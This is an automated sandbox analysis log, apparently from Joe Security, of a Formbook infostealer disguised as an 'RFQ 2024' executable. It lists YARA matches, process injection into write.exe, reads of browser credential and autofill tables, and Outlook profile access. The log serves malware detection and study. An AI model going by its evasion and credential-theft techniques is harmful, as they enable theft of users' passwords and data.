Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F6AD00	4_2_04F6AD00
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F62EE8	4_2_04F62EE8
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F71EB2	4_2_04F71EB2
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502FF63	4_2_0502FF63
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F90E50	4_2_04F90E50
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FB2E48	4_2_04FB2E48
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502EFBF	4_2_0502EFBF
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05021FC6	4_2_05021FC6
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F76FE0	4_2_04F76FE0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05010E6D	4_2_05010E6D
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05020EAD	4_2_05020EAD
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05029ED2	4_2_05029ED2
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F7CF00	4_2_04F7CF00
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F728C0	4_2_04F728C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FE98B2	4_2_04FE98B2
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F86882	4_2_04F86882
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F79870	4_2_04F79870
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F8B870	4_2_04F8B870
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F56868	4_2_04F56868
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502E9A6	4_2_0502E9A6
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F9E810	4_2_04F9E810
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F73800	4_2_04F73800
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_05010835	4_2_05010835
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FB59C0	4_2_04FB59C0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F6E9A0	4_2_04F6E9A0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502F872	4_2_0502F872
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_050218DA	4_2_050218DA
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_050278F3	4_2_050278F3
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502FB2E	4_2_0502FB2E
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F8FAA0	4_2_04F8FAA0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502CA13	4_2_0502CA13
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FE4BC0	4_2_04FE4BC0
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502EA5B	4_2_0502EA5B
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_0502FA89	4_2_0502FA89
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04FADB19	4_2_04FADB19
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04F70B10	4_2_04F70B10
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3F11D	4_2_04E3F11D
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3E446	4_2_04E3E446
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3CC08	4_2_04E3CC08
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3E563	4_2_04E3E563
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3E8FD	4_2_04E3E8FD
Source: C:\Windows\SysWOW64\write.exe	Code function: 4_2_04E3D968	4_2_04E3D968

Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04FEEF10 appears 105 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04FA5050 appears 36 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04F5B910 appears 266 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04FB7BE4 appears 88 times
Source: C:\Windows\SysWOW64\write.exe	Code function: String function: 04FDE692 appears 84 times
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: String function: 01645050 appears 36 times
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: String function: 0168EF10 appears 105 times
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: String function: 01657BE4 appears 88 times
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: String function: 0167E692 appears 84 times
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Code function: String function: 015FB910 appears 266 times

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000000.00000002.108764603637.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameMsMpLics.dllj% vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000000.00000002.108764603637.000000000080E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamempclient.dllj% vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000000.00000000.108636281697.00000000000F2000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameccPt.exe8 vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000000.00000002.108764136984.000000000077E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000000.00000002.108771368627.0000000006CA0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameTyrone.dll8 vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069647658.0000000001186000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewritej% vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069933356.00000000016FD000.00000040.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069647658.0000000001178000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewritej% vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Binary or memory string: OriginalFilenameccPt.exe8 vs AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 2.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.109069478758.0000000001120000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.109068418173.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.112736877355.0000000004D30000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000004.00000002.112736541282.0000000004B60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000005.00000002.113717742258.0000000001260000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000002.00000002.109071309836.0000000001A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
Source: 00000003.00000002.113718158167.0000000002990000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, f29uMAYA75rQjpJamT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.SetAccessControl
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.AddAccessRule
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, UndoPopup.cs	Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, UndoMethodAction.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, f29uMAYA75rQjpJamT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.SetAccessControl
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.387f8f0.0.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.AddAccessRule
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.3907b10.1.raw.unpack, f29uMAYA75rQjpJamT.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.SetAccessControl
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: 0.2.AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.6ca0000.3.raw.unpack, l7CvVv73RVnMRs0rwk.cs	Security API names: _0020.AddAccessRule

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/2@17/12

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe.log

Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Mutant created: NULL

Source: C:\Windows\SysWOW64\write.exe

File created: C:\Users\user\AppData\Local\Temp\Um65m294

Jump to behavior

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: write.exe, 00000004.00000002.112739290418.0000000008043000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109265616086.000000000803B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE benefit_merchant_domains (benefit_id VARCHAR NOT NULL, merchant_domain VARCHAR NOT NULL)U;
Source: write.exe, 00000004.00000003.109260325103.00000000030AA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000002.112735509747.00000000030CA000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000003.109260520049.00000000030CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: write.exe, 00000004.00000003.109269510237.000000000809C000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000002.112739290418.00000000080A8000.00000004.00000020.00020000.00000000.sdmp, Um65m294.4.dr	Binary or memory string: CREATE TABLE "autofill_profile_edge_extended" ( guid VARCHAR PRIMARY KEY, date_of_birth_day VARCHAR, date_of_birth_month VARCHAR, date_of_birth_year VARCHAR, source INTEGER NOT NULL DEFAULT 0, source_id VARCHAR)[;

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Virustotal: Detection: 63%
Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	ReversingLabs: Detection: 63%

Source: unknown	Process created: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process created: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Process created: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe "C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe"	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Process created: C:\Windows\SysWOW64\write.exe "C:\Windows\SysWOW64\write.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: iconcodecservice.dll	Jump to behavior
Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\write.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\XcYfrYJkVRdTsSfqplTUwXDIDGzBjhVjbZFUHaKk\nosimiokOMOHm.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\write.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Jump to behavior

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: write.pdbGCTL source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069647658.0000000001178000.00000004.00000020.00020000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113716505102.0000000000A87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: write.pdb source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069647658.0000000001178000.00000004.00000020.00020000.00000000.sdmp, nosimiokOMOHm.exe, 00000003.00000002.113716505102.0000000000A87000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: nosimiokOMOHm.exe, 00000003.00000002.113716905643.0000000000EAE000.00000002.00000001.01000000.0000000A.sdmp, nosimiokOMOHm.exe, 00000005.00000000.109134933318.0000000000EAE000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: wntdll.pdbUGP source: AL HAYAT DUBAI UAE PRODUCTION RFQ 2024.exe, 00000002.00000002.109069933356.00000000015D0000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000004.00000002.112737095408.000000000505D000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000004.00000003.109069267255.0000000004BDB000.00000004.00000020.00020000.00000000.sdmp, write.exe, 00000004.00000002.112737095408.0000000004F30000.00000040.00001000.00020000.00000000.sdmp, write.exe, 00000004.00000003.109072057070.0000000004D86000.00000004.00000020.00020000.00000000.sdmp
